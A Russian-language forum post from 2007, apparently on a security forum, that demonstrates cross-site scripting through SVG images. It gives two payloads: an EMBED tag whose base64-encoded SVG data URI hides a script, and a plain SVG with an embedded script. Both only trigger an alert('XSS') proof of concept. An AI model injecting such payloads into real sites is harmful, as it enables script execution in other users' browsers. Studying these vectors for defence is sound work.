Тема: XSS in Scalable Vector Graphics(SVG)
Показать сообщение отдельно

XSS in Scalable Vector Graphics(SVG)
  #1  
Старый 19.02.2007, 18:20
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию XSS in Scalable Vector Graphics(SVG)
Формат является открытым стандартом, который основан на языке XML, SVG формат объединяет в себе графические данные, текст и интерактивные компоненты. Подержка браузеров и производителей графического ПО.
Cайте формата http://www.w3.org/Graphics/SVG
thx nEUrOO за первую демонстрацию.

Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


Код:
<svg
...

<script>
   <![CDATA[
	alert("XSS");
   ]]>
  </script>
</svg>
Пример
Последний раз редактировалось ettee; 29.07.2008 в 20:51..
 
Ответить с цитированием